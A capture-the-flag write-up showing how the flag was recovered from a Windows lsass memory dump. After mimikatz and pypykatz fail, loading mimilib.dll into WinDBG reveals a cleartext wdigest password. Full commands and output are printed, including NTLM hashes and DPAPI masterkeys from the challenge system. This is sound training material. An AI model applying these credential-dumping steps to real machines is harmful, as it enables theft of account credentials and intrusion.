Flash CTF – Mimican’t

Solution

With challenges like this, our goal is usually to get the user credentials from the lsass dump.

Typically an attacker will use mimikatz or pypykatz for this:

Mimikatz.exe

mimikatz # sekurlsa::minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.DMP' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

mimikatz.exe errors out on this dump, so that method isn’t working.

Pypykatz

$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 734641 (b35b1)
session_id 1
username admin
domainname Windows11
logon_server WINDOWS11
logon_time 2024-07-24T02:44:18.032167+00:00
sid S-1-5-21-483730973-3935168663-2658520910-1001
luid 734641
        == MSV ==
                Username: admin
                Domain: Windows11
                LM: NA
                NT: bc53e562b5f887d90d0127c3004d5e57
                SHA1: 3e2b30fa9dc8fcea2b23b66672e50cfbcd375940
                DPAPI: 3e2b30fa9dc8fcea2b23b66672e50cfb
        == Kerberos ==
                Username: admin
                Domain: Windows11
        == DPAPI [b35b1]==
                luid 734641
                key_guid e48fdb29-12c3-4c56-9cfc-8f2b7ada9bfb
                masterkey 4f41985744b69b72e74fb579cfdb5741b27b56b357ccb20b685e2013c49e96b6f563b1080b7f3b1084704d129eb7f62327b65c0f86eb269fc7e342fea35b4d2c
                sha1_masterkey 165486625720178d5e0794f08ba282e6583683dc
        == DPAPI [b35b1]==
                luid 734641
                key_guid c43e0061-0e96-4d35-bc0e-b016fc57c107
                masterkey e5e0fd1e85f354da3d40c9ee48e3ca0baf277572c2c699f1791538f26f382f80ff5a549c998650ab4d9dd6e0d6dc1385166b715a57ddbc911059a905b65d3ed7
                sha1_masterkey 02538d30315be443b4570f9a00e820d5975f1182
        == DPAPI [b35b1]==
                luid 734641
                key_guid 687d0a9c-02e3-4752-896a-5a9aa213b059
                masterkey f6ce01789039d4bf1b14976712ce9aeb81ee4c754d5bad701a8ba1a8d76fc9cb1f78acfb6ef274ac5ce0f4a226542e6ca64f95bde67bd0e702c4f9e684f14d1b
                sha1_masterkey 1c4ae82c98c3308fac9bc5485ff0c1bbdff56099

== LogonSession ==
authentication_id 734600 (b3588)
session_id 1
username admin
domainname Windows11
logon_server WINDOWS11
logon_time 2024-07-24T02:44:18.032167+00:00
sid S-1-5-21-483730973-3935168663-2658520910-1001
luid 734600
        == MSV ==
                Username: admin
                Domain: Windows11
                LM: NA
                NT: bc53e562b5f887d90d0127c3004d5e57
                SHA1: 3e2b30fa9dc8fcea2b23b66672e50cfbcd375940
                DPAPI: 3e2b30fa9dc8fcea2b23b66672e50cfb
        == Kerberos ==
                Username: admin
                Domain: Windows11

Pypykatz is also failing, because none of the WDIGEST fields contain clear-text credentials. Thankfully there are some more methods we can try.

WinDBG with DLL Loading

Another method we can try was written about by Daniel Sauder: it uses WinDBG and loads a DLL (mimilib.dll) to analyze the lsass dump. A link to the method can be found here.

The basic steps are as follows:

  1. Open lsass.DMP with WinDBG
  2. .load <path-to-mimilib.dll>
  3. !mimikatz
  4. Get credentials

0:000> .load D:\Forensic_tool\Mimikatz\mimilib.dll

  .#####.   mimikatz 2.2.0 (x64) built on Aug 10 2021 02:01:09
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 22631
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */

===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================

0:000> !mimikatz

DPAPI Backup keys
=================
Current prefered key:       {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}

DPAPI System
============
full: 4a9f20042cf5603b8cd5adaa4514ffd119072973ad140ddd0c409307bf260161b6f60a43687de206
m/u : 4a9f20042cf5603b8cd5adaa4514ffd119072973 / ad140ddd0c409307bf260161b6f60a43687de206

SekurLSA
========

Authentication Id : 0 ; 684934 (00000000:000a7386)
Session           : Interactive from 1
User Name         : admin
Domain            : Windows11
Logon Server      : WINDOWS11
Logon Time        : 7/24/2024 10:39:46 AM
SID               : S-1-5-21-483730973-3935168663-2658520910-1001
        msv : 
         [00000003] Primary
         * Username : admin
         * Domain   : Windows11
         * NTLM     : bc53e562b5f887d90d0127c3004d5e57
         * SHA1     : 3e2b30fa9dc8fcea2b23b66672e50cfbcd375940
         * DPAPI    : fcea2b23b66672e50cfbcd375940bc53
        tspkg : KO
        wdigest : 
         * Username : admin
         * Domain   : Windows11
         * Password : MetaCTF{Rice_shirt_rice_money}
        kerberos : 
         * Username : admin
         * Domain   : Windows11
         * Password : (null)
        ssp : 
        masterkey : 
         [00000000]
         * GUID      :  {e48fdb29-12c3-4c56-9cfc-8f2b7ada9bfb}
         * Time      :  7/24/2024 3:53:07 AM
         * MasterKey :  4f41985744b69b72e74fb579cfdb5741b27b56b357ccb20b685e2013c49e96b6f563b1080b7f3b1084704d129eb7f62327b65c0f86eb269fc7e342fea35b4d2c
         [00000001]
         * GUID      :  {687d0a9c-02e3-4752-896a-5a9aa213b059}
         * Time      :  7/24/2024 3:53:07 AM
         * MasterKey :  f6ce01789039d4bf1b14976712ce9aeb81ee4c754d5bad701a8ba1a8d76fc9cb1f78acfb6ef274ac5ce0f4a226542e6ca64f95bde67bd0e702c4f9e684f14d1b
         [00000002]
         * GUID      :  {c43e0061-0e96-4d35-bc0e-b016fc57c107}
         * Time      :  7/24/2024 3:52:37 AM
         * MasterKey :  e5e0fd1e85f354da3d40c9ee48e3ca0baf277572c2c699f1791538f26f382f80ff5a549c998650ab4d9dd6e0d6dc1385166b715a57ddbc911059a905b65d3ed7
        credman : 

Authentication Id : 0 ; 684887 (00000000:000a7357)
Session           : Interactive from 1
User Name         : admin
Domain            : Windows11
Logon Server      : WINDOWS11
Logon Time        : 7/24/2024 10:39:46 AM
SID               : S-1-5-21-483730973-3935168663-2658520910-1001
        msv : 
         [00000003] Primary
         * Username : admin
         * Domain   : Windows11
         * NTLM     : bc53e562b5f887d90d0127c3004d5e57
         * SHA1     : 3e2b30fa9dc8fcea2b23b66672e50cfbcd375940
         * DPAPI    : fcea2b23b66672e50cfbcd375940bc53
        tspkg : KO
        wdigest : 
         * Username : admin
         * Domain   : Windows11
         * Password : MetaCTF{Rice_shirt_rice_money}
        kerberos : 
         * Username : admin
         * Domain   : Windows11
         * Password : (null)
        ssp : 
        masterkey : 
        credman : 
    

Flag

MetaCTF{Rice_shirt_rice_money}